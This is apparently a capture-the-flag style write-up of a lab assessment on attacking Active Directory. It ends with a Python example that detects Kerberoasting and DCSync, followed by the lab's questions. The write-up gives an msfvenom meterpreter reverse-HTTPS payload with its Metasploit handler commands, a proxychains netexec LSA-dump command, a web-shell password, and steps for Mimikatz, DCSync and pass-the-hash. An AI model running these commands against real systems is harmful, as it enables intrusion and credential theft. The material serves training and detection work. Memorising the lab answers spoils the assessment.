AD Enumeration & Attacks - Skills Assessment Part I
The Scenario
A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.
Apply what you learned in this module to compromise the domain and answer the questions below to complete part I of the skills assessment.
Write Up
We start by logging into the web shell provided; once in, we download the file C:\Windows\Users\Administrator\Desktop\flag.txt
Next, we enumerate all the SPNs and dump all available tickets with setspn.exe -Q */*
I then tried to upload Mimikatz, which worked fine, but when I came to run it the web shell hung.
The solution was to create a more stable reverse shell from my attacking host.
The first step is to upload an msfvenom payload and run it from the web shell; meanwhile, on the attack host, I opened msfconsole, started a handler for the payload and got a reverse shell.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> -f exe -o backupscript.exe LPORT=8080
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost <IP>
set lport 8080
run
Now we can run Mimikatz and dump the hashes.
We then prepare the hash and feed it into hashcat; we get a hit: lucky7
We can now connect to the host MS01 with Enter-PSSession, and once in we can grab the flag from the Administrator account's desktop.
Our next job is to find a cleartext password on the new domain; we need to set up a pivot to do this.
We can use Metasploit's autoroute and SOCKS proxy modules for this; make sure the proxychains.conf file has been set correctly with the matching socks4/socks5 proxy line.
Now we can run netexec (formerly CrackMapExec) and dump the users and hashes from LSA:
sudo proxychains netexec smb 172.16.6.50 -u svc_sql -p lucky7 --lsa
We can see from the output that we now have a username and, in this case, a cleartext password!
We can now see from our scans that the user tpetty has the ability to perform a DCSync attack, so we can abuse this to gain access to the next domain.
This dumped the Administrator hash.
We can now use this hash to perform a pass-the-hash (PtH) attack with any chosen tool; I decided to go for evil-winrm.
With a shell on the system, we can go ahead and complete our last task and dump the flag!
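A detection view of two steps in this write-up (the SPN enumeration and Kerberoasting earlier, and the DCSync just described), as an added Python example that is not part of the original write-up: it runs two simple rules over constructed, simplified key=value summaries of Windows Security events 4769 (Kerberos service ticket requested) and 4662 (operation performed on an object). The field names follow the Windows event schema; the one-event-per-line text format, the account names and the IP address are constructed for the example, and the replication-rights and domainDNS GUIDs are the standard Active Directory constants. A real pipeline would feed the same fields from a log shipper or SIEM rather than from this string.

```python
"""Two detection rules over constructed Windows Security event summaries:
   - Kerberoasting: one requester pulling RC4-encrypted service tickets
     (Event 4769, TicketEncryptionType 0x17) for several distinct SPN accounts.
   - DCSync: a non-DC principal exercising directory replication rights on the
     domain naming context (Event 4662 with the DS-Replication-Get-Changes GUIDs).
The log format below is CONSTRUCTED for this example, not real Windows XML."""

import re
from collections import defaultdict

# Well-known AD GUIDs used by DCSync detection rules.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcc2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcc2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # domainDNS object class
RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; AES is 0x11 / 0x12

KV_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed sample events: account names, host and IP are made up.
SAMPLE_LOG = """\
EventID=4769 TargetUserName=jsmith@INLANEFREIGHT.LOCAL ServiceName=MS01$ TicketEncryptionType=0x12 Status=0x0 IpAddress=172.16.6.100
EventID=4769 TargetUserName=jsmith@INLANEFREIGHT.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=172.16.6.100
EventID=4769 TargetUserName=jsmith@INLANEFREIGHT.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=172.16.6.100
EventID=4769 TargetUserName=jsmith@INLANEFREIGHT.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=172.16.6.100
EventID=4769 TargetUserName=jsmith@INLANEFREIGHT.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0 IpAddress=172.16.6.100
EventID=4662 SubjectUserName=DC02$ ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcc2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcc2}
EventID=4662 SubjectUserName=tpetty ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcc2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcc2}
EventID=4662 SubjectUserName=jsmith ObjectType=%{bf967aba-0de6-11d0-a285-00aa003049e2} Properties={bf967a86-0de6-11d0-a285-00aa003049e2}
"""


def parse_event(line):
    """Turn one constructed 'key=value key=value ...' line into a dict.
    Values may contain spaces (the Properties field does), so a value runs
    until the next ' key=' token or the end of the line."""
    return {k: v for k, v in KV_RE.findall(line.strip())}


def detect_kerberoasting(lines, min_distinct=2):
    """Return {(requester, ip): [service accounts]} for requesters that obtained
    RC4 service tickets for at least `min_distinct` distinct user-owned SPN
    accounts. Computer accounts (trailing '$') and krbtgt are excluded: they are
    not the crackable service-account secrets a Kerberoaster is after."""
    seen = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue
        if ev.get("TicketEncryptionType", "").lower() != RC4_HMAC:
            continue
        svc = ev.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        seen[(ev.get("TargetUserName"), ev.get("IpAddress"))].add(svc)
    return {key: sorted(svcs) for key, svcs in seen.items() if len(svcs) >= min_distinct}


def detect_dcsync(lines, allowed=frozenset()):
    """Return [(subject, [replication GUIDs])] for 4662 events where a principal
    that is neither a computer account nor on the allow-list (for example a
    directory-sync service account) used replication rights on the domain."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        if DOMAIN_DNS_CLASS not in ev.get("ObjectType", "").lower():
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        used = guids & REPLICATION_GUIDS
        if not used:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.endswith("$") or subject in allowed:
            continue  # domain controllers replicate legitimately
        hits.append((subject, sorted(used)))
    return hits


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for (user, ip), svcs in detect_kerberoasting(lines).items():
        print(f"[kerberoast] {user} from {ip} requested RC4 tickets for {svcs}")
    for subject, guids in detect_dcsync(lines):
        print(f"[dcsync] {subject} exercised replication rights {guids}")
```

The Kerberoasting rule keys on a burst of distinct service accounts rather than on a single RC4 ticket, because occasional RC4 requests from legacy clients are normal; the DCSync rule keys on the two replication extended rights on the domainDNS object and relies on an allow-list for the few non-DC accounts (such as a directory synchronisation service) that legitimately replicate.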
-----
Questions
Submit the contents of the flag.txt file on the administrator Desktop of the web server
Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer
Crack the account's password. Submit the cleartext value.
Submit the contents of the flag.txt file on the Administrator desktop on MS01
Find cleartext credentials for another domain user. Submit the username as your answer.
Submit this user's cleartext password.
What attack can this user perform?
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01